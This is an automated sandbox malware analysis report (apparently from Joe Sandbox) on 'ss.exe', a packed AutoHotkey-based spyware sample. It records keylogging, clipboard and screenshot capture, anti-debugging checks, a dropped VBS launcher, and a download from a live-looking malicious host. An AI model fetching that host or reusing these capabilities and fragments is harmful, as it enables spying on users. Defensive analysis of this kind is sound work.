Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:22.0.0
Analysis ID:521716
Start time:13:53:57
Joe Sandbox Product:Cloud
Start date:03.04.2018
Overall analysis duration:0h 6m 9s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:ss.exe
Cookbook file name:default.jbs
Analysis system description:Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:6
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal72.spyw.winEXE@4/2@1/2
HCA Information:
  • Successful, ratio: 95%
  • Number of executed functions: 140
  • Number of non-executed functions: 121
EGA Information:
  • Successful, ratio: 100%
HDC Information:Failed
Cookbook Comments:
  • Adjust boot time
  • Correcting counters for adjusted boot time
  • Adjusted system time to: 21/5/2016
  • Found application associated with file extension: .exe
Warnings:
Show All
  • Exclude process from analysis (whitelisted): WmiPrvSE.exe, WMIADAP.exe, dllhost.exe
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

StrategyScoreRangeReportingDetection
Threshold720 - 100Report FP / FNmalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample HTTP request are all non existing, likely the sample is no longer working
Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook
Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--"
Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook



Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for unpacked fileShow sources
Source: 2.2.ss.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 2.0.ss.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 2.1.ss.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen
Multi AV Scanner detection for submitted fileShow sources
Source: ss.exevirustotal: Detection: 31%Perma Link

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality to register a low level keyboard hookShow sources
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00408C80 SetWindowsHookExA 0000000D,Function_00004800,00400000,000000002_2_00408C80
Contains functionality for read data from the clipboardShow sources
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00404620 GetTickCount,IsClipboardFormatAvailable,GetTickCount,OpenClipboard,OpenClipboard,GetTickCount,OpenClipboard,2_2_00404620
Contains functionality to record screenshotsShow sources
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00437340 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,ReleaseDC,SelectObject,DeleteDC,DeleteObject,GetPixel,ReleaseDC,2_2_00437340
Contains functionality to retrieve information about pressed keystrokesShow sources
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_0040EEC0 GetCurrentThreadId,GetKeyboardState,SetKeyboardState,PostMessageA,PostMessageA,PostMessageA,GetModuleHandleA,GetProcAddress,GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetAsyncKeyState,keybd_event,keybd_event,GetAsyncKeyState,keybd_event,GetAsyncKeyState,GetModuleHandleA,GetProcAddress,2_2_0040EEC0

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2008259 ET TROJAN Suspicious User-Agent (AutoHotkey) 192.168.1.16:49188 -> 195.216.243.130:80
Social media urls found in memory dataShow sources
Source: ss.exeString found in binary or memory: http://www.facebook.com/ucoz.web.builder
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /runings.zip HTTP/1.1User-Agent: AutoHotkeyHost: runing.clan.suCache-Control: no-cache
Found strings which match to known social media urlsShow sources
Source: ss.exe, runings.zip.2.drString found in binary or memory: <li><a href="http://www.facebook.com/ucoz.web.builder" target="_blank">Facebook</a></li> equals www.facebook.com (Facebook)
Source: ss.exe, runings.zip.2.drString found in binary or memory: <li><a href="https://twitter.com/#!/ucoz_en" target="_blank">Twitter</a></li></ul> equals www.twitter.com (Twitter)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: runing.clan.su
Tries to download non-existing http data (HTTP/1.1 404 Not Found)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.8.0Date: Tue, 03 Apr 2018 11:56:00 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=15Data Raw: 31 61 64 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 54 54 50 20 34 30 34 20 52 65 73 6f 75 72 63 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 20 66 6f 6e 74 3a 20 31 32 70 78 2f 32 32 70 78 20 27 56 65 72 64 61 6e 61 27 3b 20 63 6f 6c 6f 72 3a 20 23 36 38 36 38 36 38 3b 7d 0a 6
Urls found in memory or binary dataShow sources
Source: ss.exeString found in binary or memory: file:///C:/ProgramData/start.vbs
Source: ss.exeString found in binary or memory: file:///C:/ProgramData/start.vbsC
Source: ss.exeString found in binary or memory: file:///C:/ProgramData/start.vbsW
Source: ss.exeString found in binary or memory: http://ahkscript.org
Source: ss.exeString found in binary or memory: http://ahkscript.orgCould
Source: ss.exe, runings.zip.2.drString found in binary or memory: http://book.ucoz.com
Source: ss.exe, runings.zip.2.drString found in binary or memory: http://counter.yadro.ru/hit;counter1?r
Source: ss.exe, runings.zip.2.drString found in binary or memory: http://faq.ucoz.com/
Source: ss.exe, runings.zip.2.drString found in binary or memory: http://forum.ucoz.com/
Source: ss.exe, runings.zip.2.drString found in binary or memory: http://google.com/search
Source: ss.exeString found in binary or memory: http://runing.clan.su/runings.zip
Source: ss.exeString found in binary or memory: http://runing.clan.su/runings.zip-
Source: ss.exeString found in binary or memory: http://runing.clan.su/runings.zipC:
Source: ss.exe, runings.zip.2.drString found in binary or memory: http://top.ucoz.com/
Source: ss.exe, runings.zip.2.drString found in binary or memory: http://ucoz.com
Source: ss.exe, runings.zip.2.drString found in binary or memory: http://ucoz.com/register/
Source: ss.exe, runings.zip.2.drString found in binary or memory: http://www
Source: ss.exe, runings.zip.2.drString found in binary or memory: http://www.facebook.com/ucoz.web.builder
Source: ss.exeString found in binary or memory: http://www.ucoz.com/pric
Source: ss.exe, runings.zip.2.drString found in binary or memory: http://www.ucoz.com/pricing/
Source: ss.exe, runings.zip.2.drString found in binary or memory: http://www.ucoz.com/privacy/
Source: ss.exe, runings.zip.2.drString found in binary or memory: http://www.ucoz.com/terms/
Source: ss.exe, runings.zip.2.drString found in binary or memory: http://www.ucoz.com/tour/
Source: ss.exe, runings.zip.2.drString found in binary or memory: https://ssl
Source: ss.exe, runings.zip.2.drString found in binary or memory: https://twitter.com/#

Remote Access Functionality:

barindex
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)Show sources
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00414C40 Shell_NotifyIcon,DeleteObject,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DestroyCursor,DeleteObject,DestroyCursor,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyCursor,DestroyCursor,IsWindow,DestroyWindow,DeleteObject,RemoveClipboardFormatListener,ChangeClipboardChain,mciSendStringA,mciSendStringA,mciSendStringA,RtlDeleteCriticalSection,OleUninitialize,2_2_00414C40
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00415590 AddClipboardFormatListener,PostMessageA,SetClipboardViewer,RemoveClipboardFormatListener,ChangeClipboardChain,2_2_00415590

Stealing of Sensitive Information:

barindex
OS version to string mapping found (often used in BOTs)Show sources
Source: ss.exeBinary or memory string: WIN_7
Source: ss.exeBinary or memory string: WIN_8.1
Source: ss.exeBinary or memory string: WIN_VISTA
Source: ss.exeBinary or memory string: ?*A Goto/Gosub must not jump into a block that doesn't enclose it.ddddddd%02d%dmsSlowLogoffSingle1.1.23.07\AutoHotkey.exeWIN32_NTWIN_XPWIN_7WIN_8.1WIN_8WIN_VISTAWIN_2003WIN_2000%04hXcomspecGetCursorInfo0x%Ix*pPIntStrPtrShortCharInt64DoubleAStrWStrgdi32comctl32-3-4CDecl-2This DllCall requires a prior VarSetCapacity. The program is now unstable and will exit.Pos%sLen%sPos%dLen%dLenMarkpcre_calloutCompile error %d at offset %d: %hs-+0 #diouxXeEfgGaAcCpULlTt%0.*fCcFfSelectVisCenterUniDescCaseLogicalNoSortAutoHdrFirstBoldExpandGDI+JoyJoyXJoyYJoyZJoyRJoyUJoyVJoyPOVJoyNameJoyButtonsJoyAxesJoyInfoGetProcessImageFileNameApsapiH
Source: ss.exeBinary or memory string: WIN_8
Source: ss.exeBinary or memory string: WIN_XP

Persistence and Installation Behavior:

barindex
May use bcdedit to modify the Windows boot settingsShow sources
Source: ss.exeBinary or memory string: (bcdedit.exe

Data Obfuscation:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00450930 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,FreeLibrary,GetTickCount,GetTickCount,PeekMessageA,GetTickCount,GetTickCount,GetTickCount,PeekMessageA,GetTickCount,FreeLibrary,DeleteFileA,FreeLibrary,2_2_00450930
Sample is packed with UPXShow sources
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_004403A0 SetLastError,DeleteFileA,GetLastError,FindFirstFileA,GetLastError,GetTickCount,GetTickCount,PeekMessageA,GetTickCount,DeleteFileA,GetLastError,FindNextFileA,FindClose,2_2_004403A0
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00472770 __Stoull,_strncpy,FindFirstFileA,FindFirstFileA,FindClose,FindFirstFileA,FindClose,2_2_00472770
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00452490 GetFileAttributesA,FindFirstFileA,FindClose,2_2_00452490
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00451070 GetFileAttributesA,FindFirstFileA,FindClose,CoInitialize,CoCreateInstance,MultiByteToWideChar,CoUninitialize,2_2_00451070
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_004726E0 __Stoull,FindFirstFileA,FindClose,GetFileAttributesA,2_2_004726E0
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00441700 CreateFileA,GetFileSizeEx,CloseHandle,FindFirstFileA,GetLastError,FindClose,__alldiv,2_2_00441700
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00451E00 GetFullPathNameA,GetFullPathNameA,GetFullPathNameA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,FindFirstFileA,GetLastError,__wsplitpath,GetLastError,GetTickCount,PeekMessageA,GetTickCount,MoveFileA,DeleteFileA,MoveFileA,GetLastError,CopyFileA,GetLastError,FindNextFileA,FindClose,2_2_00451E00
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00440F8D FindFirstFileA,GetLastError,2_2_00440F8D
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_0042B115 FindFirstFileA,FindNextFileA,FindClose,2_2_0042B115
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00440AD7 GetTickCount,GetTickCount,PeekMessageA,GetTickCount,FindNextFileA,FindClose,FindFirstFileA,GetTickCount,PeekMessageA,GetTickCount,FindNextFileA,FindClose,__itow,2_2_00440AD7
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00440FC0 FindFirstFileA,GetLastError,FindClose,FileTimeToLocalFileTime,2_2_00440FC0

System Summary:

barindex
Potential malicious VBS script found (suspicious strings)Show sources
Source: C:\Users\user\Desktop\ss.exeDropped file: Set xhzhx = CreateObject("Wscript.Shell")Jump to dropped file
Contains functionality to communicate with device driversShow sources
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_0043D1E0: CreateFileA,DeviceIoControl,CloseHandle,2_2_0043D1E0
Contains functionality to shutdown / reboot the systemShow sources
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00452610 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,2_2_00452610
Detected potential crypto functionShow sources
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_0040136A2_2_0040136A
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_004566A02_2_004566A0
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00404B302_2_00404B30
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_004161B02_2_004161B0
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_0047C0752_2_0047C075
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_004712402_2_00471240
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_0040D4E02_2_0040D4E0
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_0043C0702_2_0043C070
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_0047A4092_2_0047A409
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_0047B88D2_2_0047B88D
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00406CD02_2_00406CD0
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_004833302_2_00483330
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00419D602_2_00419D60
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_0047C2D32_2_0047C2D3
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_004125702_2_00412570
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00421EA02_2_00421EA0
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_0041BF102_2_0041BF10
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_0048EC202_2_0048EC20
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_0048F1712_2_0048F171
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_004902BD2_2_004902BD
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_004373402_2_00437340
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_004923AE2_2_004923AE
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\user\Desktop\ss.exeCode function: String function: 004847A1 appears 330 times
Source: C:\Users\user\Desktop\ss.exeCode function: String function: 0042D7A0 appears 168 times
Source: C:\Users\user\Desktop\ss.exeCode function: String function: 004719A0 appears 48 times
Source: C:\Users\user\Desktop\ss.exeCode function: String function: 00485220 appears 44 times
Source: C:\Users\user\Desktop\ss.exeCode function: String function: 00471A30 appears 54 times
Source: C:\Users\user\Desktop\ss.exeCode function: String function: 0042D4F0 appears 52 times
PE file contains strange resourcesShow sources
Source: ss.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Reads the hosts fileShow sources
Source: C:\Users\user\Desktop\ss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\ss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Sample file is different than original file name gathered from version infoShow sources
Source: ss.exeBinary or memory string: originalfilename vs ss.exe
Source: ss.exeBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs ss.exe
Source: ss.exeBinary or memory string: OriginalFilenameSETUPAPI.DLL.MUIj% vs ss.exe
Source: ss.exeBinary or memory string: OriginalFilenamewshtcpip.dll.muij% vs ss.exe
Source: ss.exeBinary or memory string: OriginalFilenamewscript.exe` vs ss.exe
Source: ss.exeBinary or memory string: OriginalFilenamewship6.dll.muij% vs ss.exe
Source: ss.exeBinary or memory string: System.OriginalFileName vs ss.exe
PE file has section (not .text) which is very likely to contain packed code (zlib compression ratio < 0.011)Show sources
Source: ss.exeStatic PE information: Section: UPX1 ZLIB complexity 0.994250704509
Classification labelShow sources
Source: classification engineClassification label: mal72.spyw.winEXE@4/2@1/2
Contains functionality for error loggingShow sources
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_0042E250 CreateProcessA,CloseHandle,CloseHandle,GetLastError,SetCurrentDirectoryA,GetFileAttributesA,SetCurrentDirectoryA,ShellExecuteEx,GetModuleHandleA,GetProcAddress,GetProcessId,GetLastError,FormatMessageA,2_2_0042E250
Contains functionality to adjust token privileges (e.g. debug / backup)Show sources
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00452610 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,2_2_00452610
Contains functionality to check free disk spaceShow sources
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_0043CE10 _strncpy,GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,2_2_0043CE10
Contains functionality to instantiate COM classesShow sources
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00451070 GetFileAttributesA,FindFirstFileA,FindClose,CoInitialize,CoCreateInstance,MultiByteToWideChar,CoUninitialize,2_2_00451070
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00440630 CreateFileA,__mbsupr,FindResourceA,LoadResource,LockResource,SizeofResource,WriteFile,CloseHandle,2_2_00440630
Executes visual basic scriptsShow sources
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\ProgramData\start.vbs'
Might use command line argumentsShow sources
Source: C:\Users\user\Desktop\ss.exeCommand line argument: /restart2_2_00403AF0
Source: C:\Users\user\Desktop\ss.exeCommand line argument: /force2_2_00403AF0
Source: C:\Users\user\Desktop\ss.exeCommand line argument: /ErrorStdOut2_2_00403AF0
Source: C:\Users\user\Desktop\ss.exeCommand line argument: AutoHotkey2_2_00403AF0
Source: C:\Users\user\Desktop\ss.exeCommand line argument: AutoHotkey2_2_00403AF0
Source: C:\Users\user\Desktop\ss.exeCommand line argument: Clipboard2_2_00403AF0
Source: C:\Users\user\Desktop\ss.exeCommand line argument: Clipboard2_2_00403AF0
Reads ini filesShow sources
Source: C:\Users\user\Desktop\ss.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\Desktop\ss.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Sample is known by Antivirus (Virustotal or Metascan)Show sources
Source: ss.exeVirustotal: hash found
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\ss.exe 'C:\Users\user\Desktop\ss.exe'
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\ProgramData\start.vbs'
Source: C:\Users\user\Desktop\ss.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\ProgramData\start.vbs' Jump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Contains functionality to launch a program with higher privilegesShow sources
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_0042E250 CreateProcessA,CloseHandle,CloseHandle,GetLastError,SetCurrentDirectoryA,GetFileAttributesA,SetCurrentDirectoryA,ShellExecuteEx,GetModuleHandleA,GetProcAddress,GetProcessId,GetLastError,FormatMessageA,2_2_0042E250
Contains functionality to simulate keystroke pressesShow sources
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00410450 keybd_event,2_2_00410450
Contains functionality to simulate mouse eventsShow sources
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_0040FE10 GetAsyncKeyState,GetSystemMetrics,GetSystemMetrics,GetCursorPos,WindowFromPoint,GetWindowThreadProcessId,SendMessageA,mouse_event,mouse_event,2_2_0040FE10
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: ss.exeBinary or memory string: regk-hookm-hook2-hooksjoypollPART%i-%i(no)%s%s%s%s%s%s{Raw}%s%cHotstring max abbreviation length is 40.LEFTLRIGHTRMIDDLEMX1X2WUWDWLWRuser32{Blind}{ClickLl{}^+!#{}RawTempSsASC U+ ,LWin RWin LShift RShift LCtrl RCtrl LAlt RAlt sc%03Xvk%02XALTDOWNALTUPSHIFTDOWNSHIFTUPCTRLDOWNCONTROLDOWNCTRLUPCONTROLUPLWINDOWNLWINUPRWINDOWNRWINUPRtlGetVersionntdll.dll%u.%u.%uYYYYYWeekYearYDayWorkingDirWinDirWinDelayWDayUserNameTitleMatchModeSpeedTitleMatchModeTimeSinceThisHotkeyTimeSincePriorHotkeyTimeIdlePhysicalTimeIdleTickCountThisMenuItemPosThisMenuItemThisMenuThisLabelThisHotkeyThisFuncStoreCapslockModeStartupCommonStartupStartMenuCommonStartMenuSecScriptNameScriptHwndScriptFullPathScriptDirScreenWidthScreenHeightScreenDPIRegViewPtrSizeProgramsCommonProgramsPriorKeyPriorHotkeyOSVersionOSTypeNumBatchLinesNowUTCNowMyDocumentsMSecMouseDelayPlayMouseDelayMonMMMMMMMMMMinMDayLoopRegTypeLoopRegTimeModifiedLoopRegSubKeyLoopRegNameLoopRegKeyLoopReadLineLoopFileTimeModifiedLoopFileTimeCreatedLoopFileTimeAccessedLoopFileSizeMBLoopF
Source: ss.exeBinary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowahk_idpidgroupclass%s%uProgram ManagerError text not found (please report)Q\E{0,DEFINEUTF8)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument is compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: ss.exeBinary or memory string: Program Manager
Source: ss.exeBinary or memory string: Shell_TrayWnd

Anti Debugging:

barindex
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Users\user\Desktop\ss.exeSystem information queried: KernelDebuggerInformationJump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)Show sources
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_0048B884 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0048B884
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00450930 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,FreeLibrary,GetTickCount,GetTickCount,PeekMessageA,GetTickCount,GetTickCount,GetTickCount,PeekMessageA,GetTickCount,FreeLibrary,DeleteFileA,FreeLibrary,2_2_00450930
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00491AAE GetProcessHeap,RtlAllocateHeap,__setmode_nolock,__setmode_nolock,GetProcessHeap,HeapFree,SetEndOfFile,GetLastError,2_2_00491AAE
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_0048D652 SetUnhandledExceptionFilter,2_2_0048D652
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_0048B884 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0048B884

Malware Analysis System Evasion:

barindex
Found WSH timer for Javascript or VBS script (likely evasive script)Show sources
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)Show sources
Source: C:\Users\user\Desktop\ss.exeWindow / User API: foregroundWindowGot 794Jump to behavior
Found large amount of non-executed APIsShow sources
Source: C:\Users\user\Desktop\ss.exeAPI coverage: 2.1 %
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_004403A0 SetLastError,DeleteFileA,GetLastError,FindFirstFileA,GetLastError,GetTickCount,GetTickCount,PeekMessageA,GetTickCount,DeleteFileA,GetLastError,FindNextFileA,FindClose,2_2_004403A0
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00472770 __Stoull,_strncpy,FindFirstFileA,FindFirstFileA,FindClose,FindFirstFileA,FindClose,2_2_00472770
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00452490 GetFileAttributesA,FindFirstFileA,FindClose,2_2_00452490
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00451070 GetFileAttributesA,FindFirstFileA,FindClose,CoInitialize,CoCreateInstance,MultiByteToWideChar,CoUninitialize,2_2_00451070
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_004726E0 __Stoull,FindFirstFileA,FindClose,GetFileAttributesA,2_2_004726E0
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00441700 CreateFileA,GetFileSizeEx,CloseHandle,FindFirstFileA,GetLastError,FindClose,__alldiv,2_2_00441700
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00451E00 GetFullPathNameA,GetFullPathNameA,GetFullPathNameA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,FindFirstFileA,GetLastError,__wsplitpath,GetLastError,GetTickCount,PeekMessageA,GetTickCount,MoveFileA,DeleteFileA,MoveFileA,GetLastError,CopyFileA,GetLastError,FindNextFileA,FindClose,2_2_00451E00
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00440F8D FindFirstFileA,GetLastError,2_2_00440F8D
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_0042B115 FindFirstFileA,FindNextFileA,FindClose,2_2_0042B115
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00440AD7 GetTickCount,GetTickCount,PeekMessageA,GetTickCount,FindNextFileA,FindClose,FindFirstFileA,GetTickCount,PeekMessageA,GetTickCount,FindNextFileA,FindClose,__itow,2_2_00440AD7
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00440FC0 FindFirstFileA,GetLastError,FindClose,FileTimeToLocalFileTime,2_2_00440FC0

Hooking and other Techniques for Hiding and Protection:

barindex
Contains functionality to check if a window is minimized (may be used to check if an application is visible)Show sources
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00462A00 SetWindowTextA,IsZoomed,IsIconic,__Stoull,__Stoull,__Stoull,__Stoull,__Stoull,__Stoull,__Stoull,__Stoull,__Stoull,MulDiv,MulDiv,ShowWindow,IsIconic,GetWindowLongA,GetWindowRect,MapWindowPoints,GetWindowLongA,GetWindowRect,GetWindowLongA,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongA,GetWindowLongA,GetWindowLongA,GetMenu,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SystemParametersInfoA,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,GetDlgCtrlID,SetFocus,2_2_00462A00
Source: C:\Users\user\Desktop\ss.exeCode function: 2_2_00462A00 SetWindowTextA,IsZoomed,IsIconic,__Stoull,__Stoull,__Stoull,__Stoull,__Stoull,__Stoull,__Stoull,__Stoull,__Stoull,MulDiv,MulDiv,ShowWindow,IsIconic,GetWindowLongA,GetWindowRect,MapWindowPoints,GetWindowLongA,GetWindowRect,GetWindowLongA,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongA,GetWindowLongA,GetWindowLongA,GetMenu,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SystemParametersInfoA,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,GetDlgCtrlID,SetFocus,2_2_00462A00
